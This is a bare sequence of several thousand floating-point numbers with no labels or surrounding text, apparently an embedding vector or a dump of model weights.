0.04018791764974594, 0.019503405317664146, 0.022229036316275597, -0.003418395761400461, 0.0005815626354888082, -0.006935216952115297, -0.014195995405316353, -0.028452560305595398, 0.015793519094586372, -0.0000036192395782563835, -0.021017644554376602, 0.02003338932991028, -0.007472772151231766, 0.021411346271634102, 0.016172077506780624, -0.035251494497060776, 0.03328298404812813, 0.00021471444051712751, -0.011265941895544529, -0.033161845058202744, -0.012469762936234474, -0.01433227676898241, -0.036796022206544876, 0.01706548035144806, -0.012159343808889389, 0.0037023157346993685, -0.013582728803157806, -0.005901748780161142, 0.011742927134037018, 0.0051408433355391026, -0.0029830518178641796, 0.01691405475139618, 0.018882567062973976, -0.0012104451889172196, -0.03479722514748573, 0.018292013555765152, 0.0031420469749718904, 0.0013315844116732478, -0.0038215620443224907, 0.01087224017828703, -0.022456172853708267, -0.01676263101398945, -0.005829822272062302, -0.006310593336820602, 0.010417968034744263, 0.007597696967422962, 0.024742674082517624, 0.0010353613179177046, 0.0021918616257607937, -0.04809224605560303, -0.0005261982441879809, -0.029194537550210953, -0.018655430525541306, 0.019261127337813377, 0.014831976033747196, -0.012045775540173054, 0.008055754005908966, -0.019124845042824745, 0.011402223259210587, -0.005133272148668766, 0.010735957883298397, -0.011394652538001537, 0.014725979417562485, 0.017504608258605003, 0.004160373006016016, 0.015021256171166897, 0.012765039689838886, -0.0035849621053785086, -0.013605441898107529, 0.017353184521198273, 0.02242588810622692, 0.0035054644104093313, 0.020351380109786987, 0.0037004228215664625, 0.014044571667909622, -0.0031628678552806377, 0.0001408952521160245, 0.00023316922306548804, -0.041793011128902435, -0.027544017881155014, -0.011621788144111633, 0.03700801357626915, 0.00903243850916624, -0.010561821050941944, -0.015914658084511757, -0.006284093949943781, -0.007484128698706627, 0.008222321048378944, 0.03761370852589607, -0.0006056958227418363, -0.008971869014203548, 0.018821997568011284, -0.013756866566836834, 0.06093299761414528, -0.013575157150626183, -0.010228687897324562, -0.007635552901774645, -0.0069995722733438015, 0.00000909430946194334, 0.003477072576060891, 0.01289374940097332, -0.0001970877347048372, -0.01915512979030609, 0.01418085303157568, -0.0013609228190034628, -0.01995767652988434, -0.015581524930894375, -0.029557956382632256, 0.009100579656660557, -0.006348449271172285, 0.011197801679372787, 0.00014302464842330664, 0.005791966337710619, -0.003571712411940098, -0.0030000871047377586, 0.008245034143328667, -0.0128483222797513, 0.00021495104010682553, -0.020048530772328377, -0.0022827161010354757, -0.019685113802552223, -0.012734754011034966, -0.0288159791380167, -0.0011337868636474013, 0.02268330752849579, -0.04142959415912628, -0.008434314280748367, 0.0019249770557507873, -0.010137833654880524, 0.011084233410656452, -0.025272658094763756, -0.014498843811452389, -0.01785288378596306, -0.021789906546473503, -0.027680298313498497, -0.031587038189172745, 0.009948553517460823, 0.021002503111958504, 0.08528196811676025, 0.0373714305460453, -0.022077612578868866, -0.010720815509557724, -0.019336838275194168, -0.006795149762183428, 0.023183006793260574, 0.006310593336820602, 0.0284374188631773, -0.019987961277365685, 0.031980738043785095, -0.015324103645980358, -0.0014602947048842907, -0.014354990795254707, -0.02306186780333519, -0.015929799526929855, -0.012469762936234474, -0.008941584266722202, 0.02392498403787613, 0.021623341366648674, 0.014748693443834782, 0.013401019386947155, 0.0229861568659544, -0.02787715010344982, 0.00560647202655673, -0.03918851912021637, 0.002861912827938795, -0.009297430515289307, -0.017625747248530388, -0.0071282824501395226, 0.015483099035918713, -0.010039407759904861, -0.0041868723928928375, -0.012401621788740158, 0.003834811504930258, -0.0012483012396842241, 0.02266816608607769, -0.007715050596743822, 0.007578768767416477, -0.0059471759013831615, 0.0016656634397804737, -0.012318338267505169, 0.007942186668515205, -0.011235657148063183, 0.008987011387944221, -0.014491272158920765, 0.013348021544516087, -0.010516393929719925, -0.013257167302072048, 0.005084059201180935, 0.0026423479430377483, -0.025454366579651833, 0.005205198191106319, 0.01995767652988434, -0.026590045541524887, -0.0025893496349453926, -0.012560617178678513, -0.013605441898107529, 0.01917027309536934, -0.022092754021286964, 0.01744403876364231, 0.007007143460214138, 0.007612839341163635, 0.01652035303413868, -0.007696122396737337, -0.000144680860103108, -0.016232647001743317, 0.01705033704638481, 0.005773038137704134, 0.023152722045779228, -0.0027199527248740196, -0.01635378785431385, -0.02236531861126423, -0.008941584266722202, 0.007665837649255991, 0.01894313655793667, -0.027286596596240997, -0.00023991231864783913, -0.023970412090420723, -0.011674786917865276, 0.012136629782617092, 0.022259321063756943, -0.01901884935796261, 0.008911299519240856, -0.000798288150690496, 0.017353184521198273, -0.0017650354420766234, -0.0033635045401751995, 0.006166740320622921, -0.021305350586771965, 0.0019249770557507873, 0.008139037527143955, 0.014392847195267677, -0.008419171907007694, 0.0017546250019222498, -0.0024890312924981117, 0.006617226637899876, -0.001332530751824379, -0.009948553517460823, 0.0005900802207179368, 0.00592067651450634, -0.0022467528469860554, 0.03476693853735924, 0.024666961282491684, -0.01465026754885912, 0.022092754021286964, 0.00451621925458312, 0.008010326884686947, 0.018034592270851135, -0.0074273450300097466, -0.04088446870446205, -0.025514936074614525, 0.015854088589549065, -0.021714195609092712, -0.00887344405055046, -0.02174448035657406, -0.0012000348651781678, 0.012855893932282925, 0.010455823503434658, -0.023516139015555382, -0.012719611637294292, 0.012257768772542477, 0.0051408433355391026, -0.029164252802729607, -0.006662653759121895, -0.00190415617544204, -0.003870774758979678, -0.03092077188193798, 0.03340412303805351, 0.01612665131688118, 0.03722000867128372, 0.011742927134037018, 0.013340449891984463, 0.0012132844422012568, 0.03785598650574684, -0.0138325784355402, -0.0007088533602654934, -0.014763835817575455, 0.02834656462073326, 0.001465026754885912, -0.008949155919253826, 0.024666961282491684, -0.016232647001743317, 0.008706877008080482, 0.04348896071314812, 0.014120283536612988, -0.008078468032181263, 0.014589698053896427, 0.016308359801769257, 0.0012255875626578927, -0.011705071665346622, -0.011159945279359818, 0.020427091047167778, 0.026317482814192772, 0.023940127342939377, 0.014559413306415081, 0.028846263885498047, -0.031738460063934326, -0.0039029524195939302, 0.0005077434470877051, -0.00787404552102089, 0.027059460058808327, 0.024318687617778778, -0.011076661758124828, 0.007904330268502235, 0.01823144406080246, -0.014498843811452389, -0.02135077677667141, -0.015944942831993103, -0.010531536303460598, 0.009161149151623249, -0.0013363163452595472, -0.026347767561674118, -0.0064582317136228085, -0.002945195883512497, 0.02032109536230564, -0.02618120238184929, -0.01620236225426197, -0.002943302970379591, -0.018246585503220558, 0.01035739853978157, 0.009282288141548634, -0.011712642386555672, -0.02142648957669735, 0.0237584188580513, -0.007843760773539543, 0.038613107055425644, 0.0004514326574280858, -0.02796800434589386, -0.007752906531095505, -0.006204596254974604, 0.027907434850931168, -0.0029830518178641796, -0.020987359806895256, -0.014960686676204205, -0.018367726355791092, 0.009766845032572746, 0.00572382565587759, 0.02104792930185795, -0.008290461264550686, -0.009047580882906914, -0.0028808407951146364, 0.007056356407701969, -0.0288159791380167, 0.0034202884417027235, -0.01800430752336979, 0.01652035303413868, -0.013332879170775414, -0.024091551080346107, -0.016187220811843872, -0.009940982796251774, -0.001597522757947445, -0.0007429237593896687, 0.008351030759513378, 0.03092077188193798, 0.01876142807304859, 0.01620236225426197, -0.026998890563845634, 0.011818639934062958, -0.0007093265885487199, -0.01331773679703474, -0.003444894915446639, 0.001714876270852983, 0.018125446513295174, 0.004762283526360989, -0.019972819834947586, 0.047032278031110764, -0.006102385465055704, -0.024106692522764206, 0.016611207276582718, 0.01876142807304859, 0.03219273313879967, 0.016096366569399834, -0.0036909589543938637, 0.004361009690910578, -0.016232647001743317, 0.008464599028229713, -0.014385275542736053, 0.029482243582606316, -0.0019297089893370867, -0.00027966112247668207, 0.011318940669298172, -0.01783774234354496, 0.006897361017763615, -0.021396204829216003, -0.00017106175073422492, 0.027316881343722343, 0.025439223274588585, -0.0002981159195769578, 0.01351458765566349, -0.01440798956900835, 0.013257167302072048, 0.017186619341373444, -0.005246839951723814, -0.0002678311138879508, 0.0067345802672207355, 0.012719611637294292, -0.011470364406704903, 0.03116304986178875, -0.03310127556324005, 0.007404631469398737, 0.014241422526538372, -0.024515537545084953, -0.0032423653174191713, -0.019881965592503548, 0.03379782661795616, -0.017640890553593636, -0.004209585953503847, -0.0335252620279789, 0.025514936074614525, -0.00548911839723587, 0.0006284093833528459, -0.006920074578374624, 0.015536097809672356, -0.021562770009040833, 0.03746228665113449, -0.001756517798639834, -0.027286596596240997, -0.018398011103272438, -0.004084661137312651, 0.003660673974081874, 0.029724521562457085, -0.005576187279075384, -0.01861000433564186, -0.012235055677592754, 0.011281084269285202, -0.003605782985687256, -0.018095161765813828, -0.018276870250701904, -0.012288053520023823, 0.007624195888638496, 0.009168720804154873, -0.00028391991509124637, -0.020381664857268333, 0.009403427131474018, -0.005292267072945833, -0.02368270605802536, 0.036796022206544876, 0.020775366574525833, 0.0037855987902730703, 0.01164450217038393, 0.0037534211296588182, 0.01356001477688551, 0.006443089339882135, -0.007957329042255878, 0.012666613794863224, 0.0009605956729501486, 0.000366256688721478, 0.01312088593840599, -0.0038196691311895847, 0.04270155355334282, -0.015581524930894375, -0.012833179906010628, 0.0028846263885498047, 0.011939778923988342, 0.01689891330897808, -0.019382266327738762, 0.008669021539390087, 0.0004959134384989738, -0.016611207276582718, 0.005049988627433777, 0.02095707505941391, 0.010296829044818878, -0.04158101603388786, 0.002065044129267335, -0.031284186989068985, 0.004236084874719381, 0.01083438377827406, -0.0048682801425457, 0.0021312921307981014, 0.02142648957669735, -0.0036587812937796116, 0.005776823963969946, -0.0017631426453590393, 0.020366521552205086, -0.005905534140765667, 0.009713846258819103, 0.00504241744056344, -0.01573294959962368, -0.01691405475139618, -0.015551240183413029, 0.011977634392678738, -0.01923084259033203, -0.029315676540136337, -0.0040543763898313046, 0.013605441898107529, 0.03246529400348663, 0.034009817987680435, 0.0007940293289721012, -0.0027350950986146927, -0.021835334599018097, -0.01915512979030609, -0.012356194667518139, 0.0025287799071520567, -0.005996388383209705, -0.0008692681440152228, -0.006003959570080042, -0.015354388393461704, 0.0038953812327235937, -0.022531883791089058, -0.01868571527302265, 0.009486710652709007, -0.012969461269676685, -0.006299236323684454, -0.009085437282919884, 0.029800234362483025, -0.003193152602761984, -0.004887207876890898, -0.003249936504289508, -0.002297858474776149, -0.026544619351625443, -0.01698976755142212, -0.012924034148454666, 0.02306186780333519, 0.0003295837086625397, 0.01356001477688551, 0.040854182094335556, -0.00413008825853467, -0.01776202954351902, 0.04067247360944748, 0.019760826602578163, -0.005985031835734844, 0.01635378785431385, -0.015240821056067944, -0.019897107034921646, 0.002392498543485999, -0.02577235735952854, 0.018716000020503998, 0.0039900210686028, 0.005288481712341309, 0.01437770389020443, 0.010682960040867329, -0.018398011103272438, 0.01954883150756359, -0.0028694840148091316, 0.0034827508497983217, 0.005962318275123835, -0.0022808231879025698, -0.019185414537787437, 0.01250004768371582, 0.01876142807304859, 0.0038480611983686686, -0.017035195603966713, 0.01714119128882885, 0.00802546925842762, -0.016490068286657333, -0.010039407759904861, -0.027544017881155014, 0.017156334593892097, -0.007768048904836178, 0.020366521552205086, -0.005523188505321741, 0.031223619356751442, -0.028301136568188667, -0.01192463655024767, 0.0022259321995079517, 0.00782861839979887, -0.0016429498791694641, 0.004777425900101662, 0.014188424684107304, -0.008396457880735397, 0.008275318890810013, -0.018125446513295174, -0.022092754021286964, 0.016490068286657333, -0.0015123466728255153, 0.023712990805506706, -0.0420958586037159, -0.012394050136208534, 0.025802642107009888, 0.005530759692192078, 0.009797129780054092, -0.008048183284699917, 0.01650521159172058, -0.011962492018938065, -0.03328298404812813, -0.015127252787351608, -0.025287799537181854, 0.009108150377869606, -0.01437013316899538, -0.0012359980028122663, -0.0014621875016018748, -0.014778978191316128, 0.010622390545904636, 0.004001378081738949, 0.005871463567018509, -0.008638736791908741, 0.0017319114413112402, 0.001612665131688118, -0.010092406533658504, 0.023803845047950745, -0.019412551075220108, -0.0020858650095760822, -0.0013968859566375613, 0.01629321649670601, 0.005152199883013964, 0.020290810614824295, -0.016066081821918488, -0.00615538377314806, -0.008706877008080482, 0.020472519099712372, -0.012356194667518139, 0.018564576283097267, -0.006136455573141575, 0.01627807505428791, 0.024757815524935722, -0.004595716949552298, -0.011568790301680565, 0.0032366870436817408, -0.03225330263376236, 0.012235055677592754, -0.00907029490917921, 0.017731744796037674, -0.0020612585358321667, 0.00037264489219523966, -0.007211565971374512, -0.02439439855515957, -0.007768048904836178, 0.010251401923596859, 0.000281790504232049, 0.015013684518635273, 0.008616022765636444, -0.013885576277971268, 0.0005096362438052893, 0.005954747088253498, 0.03761370852589607, -0.0035546773578971624, 0.028013430535793304, -0.002123720943927765, 0.017489466816186905, 0.0035698197316378355, -0.008169322274625301, -0.010546678677201271, 0.004217157140374184, 0.005167342256754637, 0.01231076754629612, -0.0006672117742709816, 0.01122051477432251, 0.016808059066534042, 0.0010069692507386208, -0.008116323500871658, 0.0009852021466940641, 0.01808002032339573, -0.0032745429780334234, 0.004114945884793997, -0.0019401194294914603, -0.009509424678981304, 0.019760826602578163, 0.018897708505392075, -0.004058161750435829, 0.02104792930185795, -0.014892545528709888, -0.012522760778665543, 0.013825006783008575, -0.014771406538784504, -0.012204770930111408, -0.007635552901774645, -0.007964899763464928, -0.016883770003914833, -0.007071498781442642, 0.006170526146888733, -0.001085520489141345, 0.030436214059591293, -0.02344042807817459, 0.010531536303460598, -0.007150996010750532, -0.017171476036310196, -0.0010741637088358402, -0.023107295855879784, -0.004512433893978596, 0.005068916827440262, -0.0036133541725575924, -0.002313000848516822, -0.03912794962525368, -0.0038291332311928272, 0.010137833654880524, 0.01705033704638481, -0.014294421300292015, 0.013772008940577507, 0.007461415138095617, 0.010274115018546581, -0.024969810619950294, 0.002649919129908085, 0.009721417911350727, -0.009963695891201496, -0.030436214059591293, 0.02671118453145027, -0.023955268785357475, -0.022107897326350212, 0.008896157145500183, -0.02858884260058403, -0.01140979491174221, -0.013666011393070221, -0.0029111255425959826, -0.004118731711059809, 0.0038310259114950895, -0.006901146844029427, -0.0046790000051259995, -0.01121294405311346, 0.0011527148308232427, -0.022168466821312904, 0.0019722969736903906, 0.022456172853708267, 0.0013807971263304353, 0.017489466816186905, 0.012825609184801579, -0.0028505558148026466, 0.009153577499091625, 0.003388111013919115, -0.03528178110718727, 0.007275920826941729, -0.008979440666735172, -0.021123642101883888, 0.00009600041812518612, 0.005322551820427179, -0.0023508567828685045, -0.0033956822007894516, -0.008434314280748367, 0.024030981585383415, 0.007484128698706627, 0.01145522203296423, -0.004796353634446859, -0.010675388388335705, -0.01768631860613823, 0.012946748174726963, -0.0023981768172234297, 0.012098773382604122, -0.026060061529278755, -0.030057653784751892, -0.002784308046102524, 0.004273941274732351, -0.0012766931904479861, 0.004777425900101662, 0.013885576277971268, -0.010561821050941944, -0.0015861658612266183, -0.026362910866737366, 0.0032291158568114042, -0.0005030114552937448, 0.013310165144503117, 0.004001378081738949, 0.01087224017828703, -0.012121487408876419, 0.0021634697914123535, -0.00825260579586029, 0.025651218369603157, 0.02236531861126423, -0.003812097944319248, -0.039461083710193634, -0.020608799532055855, 0.005587543826550245, -0.031041910871863365, 0.0023830344434827566, 0.012636329047381878, 0.017232045531272888, 0.019881965592503548, 0.01527110580354929, 0.0008422957616858184, -0.006927645765244961, -0.008343460038304329, -0.006007745396345854, 0.004989419132471085, -0.00158238026779145, 0.025257514789700508, 0.009683561511337757, 0.0024852456990629435, 0.0035073573235422373, -0.0059320335276424885, 0.01059967651963234, -0.008517597801983356, -0.0016372714890167117, 0.01605093851685524, 0.025181803852319717, -0.007097997702658176, 0.0032442582305520773, 0.02516666054725647, -0.015142395161092281, 0.02392498403787613, -0.015717806294560432, -0.007665837649255991, 0.013295022770762444, -0.015195393934845924, 0.011114518158137798, -0.006299236323684454, -0.02088136225938797, 0.005822251085191965, 0.00030568710644729435, 0.0020309737883508205, 0.007457629777491093, 0.0001191280607599765, 0.015066683292388916, 0.015990369021892548, 0.00022453333076555282, 0.016399214044213295, -0.00695035932585597, -0.03134475648403168, -0.027513733133673668, -0.008351030759513378, 0.006204596254974604, -0.0034808581694960594, 0.021638482809066772, -0.003441109322011471, 0.005701111629605293, 0.0023811417631804943, 0.0030436215456575155, 0.01979111135005951, -0.0021180424373596907, -0.013030030764639378, 0.027922576293349266, 0.03060278110206127, 0.002740773605182767, 0.014816833660006523, 0.0024152121040970087, 0.004050590563565493, 0.002930053509771824, -0.009668419137597084, -0.011901922523975372, -0.00031254850910045207, -0.027513733133673668, 0.004501076880842447, -0.004966705571860075, -0.008229891769587994, -0.011046377010643482, -0.016005512326955795, -0.023712990805506706, -0.00741977384313941, 0.006723223719745874, -0.019306553527712822, -0.0034070389810949564, -0.025348369032144547, -0.0040051634423434734, -0.024757815524935722, 0.0015312747564166784, 0.0058790347538888454, -0.0030682277865707874, -0.012431906536221504, -0.0009322037221863866, 0.017201760783791542, -0.009282288141548634, 0.009479139000177383, -0.006113742012530565, -0.02041194960474968, -0.009797129780054092, 0.016187220811843872, -0.017110906541347504, 0.016338644549250603, -0.0028732696082443, -0.004909921903163195, 0.004652501083910465, -0.01691405475139618, 0.023637279868125916, -0.011773211881518364, 0.0017546250019222498, 0.0004746194463223219, 0.0018842818681150675, 0.0006487569771707058, -0.01087224017828703, 0.013401019386947155, 0.00732513377442956, 0.014052142389118671, 0.008744733408093452, 0.0016751274233683944, 0.006889789830893278, -0.030663350597023964, -0.012787752784788609, -0.008722019381821156, 0.012144201435148716, -0.0009582297061569989, 0.005314980633556843, 0.010781385004520416, 0.023955268785357475, 0.008320746012032032, 0.031223619356751442, -0.013158741407096386, -0.00002954541560029611, 0.00445943558588624, 0.004024091642349958, 0.007370560895651579, -0.003649317193776369, -0.0014148675836622715, 0.029724521562457085, -0.011477936059236526, -0.009524567052721977, -0.01097823679447174, -0.010561821050941944, 0.000593865814153105, -0.0003404672897886485, 0.008525168523192406, -0.015134824439883232, 0.011144802905619144, -0.0018549434607848525, 0.020911647006869316, 0.016777774319052696, -0.007351632695645094, 0.0033956822007894516, -0.008192036300897598, -0.008434314280748367, -0.0008408761350437999, 0.0037647781427949667, 0.004800139460712671, 0.014301992021501064, 0.020987359806895256, 0.004815281834453344, 0.004731998313218355, 0.012257768772542477, 0.007514413446187973, -0.001217070035636425, -0.013438875786960125, -0.013438875786960125, -0.015172679908573627, -0.01580866053700447, 0.016944339498877525, 0.005720039829611778, -0.011281084269285202, 0.007563626393675804, -0.021593056619167328, 0.001744214678183198, -0.0056481133215129375, -0.006386305205523968, 0.0008929281029850245, 0.003707994008436799, -0.007415988016873598, 0.0006194186280481517, -0.00034567248076200485, 0.0028354134410619736, -0.01886742375791073, 0.010947952046990395, 0.011939778923988342, 0.024212690070271492, -0.01522567868232727, 0.0009279449004679918, -0.02056337334215641, -0.011477936059236526, -0.005602686200290918, -0.0023111081682145596, -0.009183863177895546, 0.01094038039445877, -0.0028524487279355526, -0.005379335954785347, 0.009872841648757458, 0.0024833527859300375, 0.003952165134251118, -0.02546950802206993, 0.004788782447576523, 0.01970025710761547, -0.0009766845032572746, -0.013681153766810894, 0.007158567197620869, 0.016399214044213295, -0.002975480630993843, -0.008441885001957417, 0.01721690408885479, 0.00211236416362226, 0.010925238020718098, 0.015316532924771309, 0.005155985709279776, -0.014771406538784504, -0.004073304124176502, 0.007563626393675804, 0.011046377010643482, 0.015013684518635273, -0.016156936064362526, 0.014529128558933735, -0.01923084259033203, 0.01378715131431818, 0.003005765378475189, -0.008987011387944221, -0.02221389301121235, 0.009002153761684895, -0.005148414522409439, -0.028634268790483475, 0.01620236225426197, 0.009668419137597084, -0.005330123007297516, -0.0054853325709700584, 0.0059471759013831615, -0.01465026754885912, -0.025651218369603157, 0.011205372400581837, -0.00033455228549428284, -0.0012927820207551122, -0.0038158835377544165, 0.017171476036310196, 0.005364193581044674, 0.0036890660412609577, 0.0018123554764315486, -0.006515015382319689, -0.006526372395455837, 0.004410222638398409, 0.013673583045601845, 0.022229036316275597, -0.008184464648365974, 0.0076923370361328125, -0.00911572203040123, 0.0038537397049367428, 0.003857525298371911, 0.003755314042791724, -0.017035195603966713, 0.009842556901276112, -0.013332879170775414, 0.028634268790483475, 0.02345556952059269, 0.001981761073693633, -0.011243228800594807, 0.0010514500318095088, 0.0194882620126009, -0.006992001086473465, -0.00594339007511735, -0.016262931749224663, -0.003149618161842227, -0.004478363320231438, -0.0037874917034059763, 0.01418085303157568, -0.011629359796643257, 0.010705673135817051, -0.011341653764247894, -0.006901146844029427, 0.012734754011034966, -0.01721690408885479, 0.008108752779662609, 0.0023622135631740093, 0.01798916608095169, -0.003547106171026826, -0.006651297211647034, 0.0005668934318237007, -0.01659606583416462, -0.015354388393461704, 0.029103683307766914, 0.010463395155966282, 0.011742927134037018, -0.016959482803940773, 0.011818639934062958, -0.017322899773716927, 0.010470966808497906, 0.0009653277229517698, 0.02798314578831196, -0.007162353023886681, -0.013454018160700798, 0.006526372395455837, 0.019412551075220108, -0.007366775535047054, -0.013242024928331375, 0.007381917908787727, 0.010660246014595032, 0.0052544111385941505, 0.0032064022962003946, -0.005617828574031591, -0.003709886921569705, 0.005848750006407499, 0.02649919129908085, 0.008419171907007694, 0.011326511390507221, -0.006674010772258043, -0.013764437288045883, 0.03060278110206127, 0.007313776761293411, -0.014710837043821812, 0.003212080569937825, 0.0018521042075008154, 0.0076544806361198425, 0.027453161776065826, 0.016944339498877525, -0.005144628696143627, 0.013105743564665318, -0.014052142389118671, 0.018988564610481262, 0.013802293688058853, 0.0008337781182490289, -0.009176291525363922, -0.01650521159172058, -0.0120760602876544, 0.00883558765053749, 0.006075886078178883, 0.006427946966141462, -0.03731086105108261, 0.01187920942902565, 0.0017839634092524648, -0.018170874565839767, -0.028376849368214607, 0.010236259549856186, 0.0067345802672207355, -0.022168466821312904, -0.011659644544124603, -0.001274800393730402, -0.0018663002410903573, 0.007169924210757017, 0.0011706964578479528, 0.01736832782626152, 0.019897107034921646, -0.008525168523192406, 0.0012577652232721448, -0.024636676535010338, -0.01847372204065323, -0.00322343735024333, -0.008366173133254051, -0.010470966808497906, 0.013635726645588875, 0.0024246759712696075, 0.017080621793866158, -0.0022070039995014668, -0.013650869019329548, -0.04657800868153572, 0.0025098519399762154, 0.03076934814453125, 0.016338644549250603, -0.0002981159195769578, 0.002369784750044346, -0.01815573126077652, -0.00699578644707799, -0.00009038117423187941, -0.005186270456761122, 0.004088446963578463, 0.012091202661395073, -0.019064275547862053, 0.020003104582428932, 0.014400417916476727, 0.0005654738051816821, -0.002155898604542017, 0.002564743161201477, -0.0036266036331653595, -0.0041528018191456795, 0.003446787828579545, -0.03988507017493248, -0.024666961282491684, 0.008237463422119617, -0.01745918206870556, -0.009024867787957191, -0.022486457601189613, 0.04058162122964859, -0.002564743161201477, -0.029891088604927063, -0.021789906546473503, 0.03549377620220184, 0.01269689854234457, 0.03670516610145569, -0.01729261502623558, 0.024712389335036278, -0.001011701300740242, 0.012833179906010628, -0.019351981580257416, -0.016399214044213295, -0.005674612708389759, -0.006931431591510773, 0.015263534151017666, 0.02206246927380562, 0.010698102414608002, -0.011780783534049988, 0.016338644549250603, -0.005950961261987686, -0.005856321193277836, 0.007362989708781242, -0.008222321048378944, -0.016641492024064064, -0.009766845032572746, 0.018095161765813828, -0.0011120196431875229, -0.012068488635122776, 0.010289257392287254, -0.00981984380632639, -0.001158393220975995, -0.009774415753781796, 0.006102385465055704, 0.005155985709279776, -0.016066081821918488, -0.037674278020858765, 0.004296654835343361, -0.012136629782617092, 0.012166914530098438, 0.003575498005375266, -0.016217505559325218, 0.004970491398125887, 0.0008446617284789681, 0.00042611645767465234, 0.01582380384206772, 0.012666613794863224, 0.012378907762467861, -0.006537728942930698, 0.015717806294560432, 0.013734152540564537, -0.004830424208194017, -0.01456698402762413, 0.002566636074334383, -0.01853429153561592, 0.0066853673197329044, -0.008653879165649414, 0.011977634392678738, -0.003647424513474107, -0.015278676524758339, -0.013075457885861397, -0.004925064276903868, -0.008971869014203548, 0.0018738714279606938, -0.014188424684107304, -0.013915861025452614, -0.002447389531880617, 0.002517423126846552, 0.0021994328126311302, -0.015430101193487644, -0.010395254008471966, 0.004660072270780802, -0.013136028312146664, -0.01892799325287342, -0.015581524930894375, 0.002651812043040991, 0.019836537539958954, 0.006674010772258043, -0.031435612589120865, -0.0015284355031326413, -0.013431305065751076, 0.014589698053896427, 0.0026044920086860657, 0.008335888385772705, -0.016580922529101372, 0.010327113792300224, 0.0010126476408913732, -0.010667817667126656, 0.0025571719743311405, -0.010455823503434658, 0.016717204824090004, 0.02157791331410408, 0.01059967651963234, -0.0017631426453590393, 0.027786295861005783, 0.0021899689454585314, 0.01745918206870556, 0.00518248463049531, -0.012734754011034966, 0.0043988656252622604, 0.006151597946882248, -0.0008082253625616431, -0.005481547210365534, 0.01900370605289936, -0.011288655921816826, 0.0019259233959019184, 0.009221718646585941, 0.010054550133645535, -0.006147812586277723, 0.01574809104204178, -0.023273861035704613, -0.019412551075220108, -0.005977460648864508, 0.0008129573543556035, 0.0233798585832119, 0.010304399766027927, 0.008737161755561829, 0.019972819834947586, 0.004709284752607346, 0.010410396382212639, -0.0010770028457045555, -0.011939778923988342, 0.023334430530667305, -0.0013751187361776829, 0.004607073962688446, -0.0039067380130290985, 0.0031874740961939096, -0.013507016934454441, -0.002860019914805889, -0.002947088796645403, 0.00424744188785553, -0.02197161503136158, -0.003575498005375266, -0.015248391777276993, 0.036341749131679535, 0.01121294405311346, 0.0019439050229266286, 0.0004388928646221757, -0.03631146252155304, -0.0013580835657194257, 0.012772610411047935, -0.020063674077391624, 0.009047580882906914, -0.03367668762803078, -0.016459783539175987, 0.01665663532912731, -0.011341653764247894, 0.0014035108033567667, -0.006011530756950378, -0.002888411981984973, -0.01620236225426197, -0.01394614577293396, 0.009728988632559776, -0.008555453270673752, -0.000026247804271406494, -0.014286849647760391, 0.00981984380632639, -0.02742287702858448, 0.00510298740118742, 0.003388111013919115, 0.0005290374392643571, 0.019609401002526283, -0.018216300755739212, -0.006204596254974604, 0.02577235735952854, -0.004425365012139082, 0.036796022206544876, -0.008631165139377117, -0.005163556896150112, 0.007518199272453785, 0.01753489300608635, -0.003944593947380781, -0.02259245328605175, 0.002744559198617935, -0.006314378697425127, -0.0016675562364980578, 0.0052581969648599625, -0.010213545523583889, -0.001085520489141345, -0.013476732186973095, -0.006450660526752472, -0.000014698770428367425, 0.022940728813409805, 0.0020290808752179146, -0.028134571388363838, 0.033616118133068085, 0.006969287525862455, 0.016490068286657333, -0.0018284441903233528, -0.01503639854490757, -0.012136629782617092, 0.019806252792477608, 0.004402651451528072, -0.02819514088332653, 0.0024682104121893644, -0.02236531861126423, -0.004099803511053324, 0.0037269219756126404, -0.015377102419734001, 0.0003295837086625397, 0.0034373237285763025, -0.008479741401970387, 0.0017924810526892543, 0.0011744820512831211, 0.006613441277295351, 0.005224126391112804, 0.023273861035704613, -0.010183260776102543, -0.009759273380041122, -0.0034259669482707977, 0.025378653779625893, -0.009426141157746315, 0.013037602417171001, -0.014741121791303158, 0.003645531600341201, -0.0036303892266005278, -0.022471314296126366, 0.005171128083020449, -0.016020653769373894, 0.011523363180458546, 0.005265768151730299, -0.019442835822701454, -0.004573003388941288, -0.0018691393779590726, -0.009789558127522469, 0.003001979785040021, -0.010296829044818878, 0.013741724193096161, 0.005981246009469032, -0.009774415753781796, -0.0038802388589829206, 0.004251227248460054, -0.005197627004235983, -0.005670826882123947, 0.004784997086971998, 0.014074856415390968, -0.00257988553494215, 0.010001552291214466, -0.02774086780846119, 0.018049735575914383, -0.002788093639537692, 0.03561491519212723, -0.00930500216782093, 0.010993379168212414, -0.001540738740004599, -0.002144541824236512, 0.006056958343833685, -0.005046203266829252, 0.01917027309536934, 0.007843760773539543, 0.015642093494534492, -0.014877403154969215, -0.01603579707443714, 0.010645103640854359, -0.0034657157957553864, 0.014029429294168949, -0.0018861746648326516, 0.02259245328605175, -0.006821649149060249, -0.03084505908191204, 0.019124845042824745, -0.020517945289611816, -0.001935387379489839, 0.034554947167634964, -0.00445943558588624, -0.0073932744562625885, 0.012447048909962177, 0.02587835304439068, 0.0003636540786828846, 0.023894699290394783, 0.013461589813232422, -0.004175515379756689, -0.003796955570578575, -0.0058790347538888454, 0.004936420824378729, -0.02687775157392025, 0.005174913443624973, 0.0005408674478530884, -0.012560617178678513, -0.0017508394084870815, -0.006253809202462435, -0.020290810614824295, -0.004527576267719269, 0.0048455665819346905, 0.00826017651706934, -0.004675214644521475, 0.008941584266722202, -0.006291665136814117, 0.004421579651534557, 0.010614818893373013, -0.009728988632559776, -0.008381315506994724, 0.0036985301412642, 0.012628757394850254, -0.016611207276582718, 0.00011120196722913533, 0.021699052304029465, -0.0010665925219655037, -0.0070336428470909595, -0.010183260776102543, -0.0029224823229014874, 0.0002284372312715277, -0.004198228940367699, 0.006836791522800922, 0.007688551209867001, 0.009872841648757458, -0.0000416711627622135, 0.0068519338965415955, -0.009993980638682842, -0.008941584266722202, 0.016156936064362526, -0.01589951477944851, 0.007389489095658064, 0.013673583045601845, -0.007283492013812065, -0.006412804592400789, 0.028376849368214607, 0.012787752784788609, 0.0009667472913861275, 0.011402223259210587, -0.0022921802010387182, 0.0007230493938550353, -0.004194443579763174, 0.008123895153403282, -0.0027521303854882717, 0.0014536699745804071, 0.014521556906402111, -0.001672288286499679, -0.0005025382270105183, 0.022637881338596344, 0.017868027091026306, -0.01761060580611229, 0.0008318853215314448, -0.024878956377506256, -0.009259575046598911, -0.01627807505428791, 0.010576963424682617, 0.0005654738051816821, -0.007718835957348347, -0.02976994961500168, -0.019836537539958954, -0.017004908993840218, 0.014559413306415081, -0.013968859799206257, 0.015301390551030636, -0.004463220946490765, 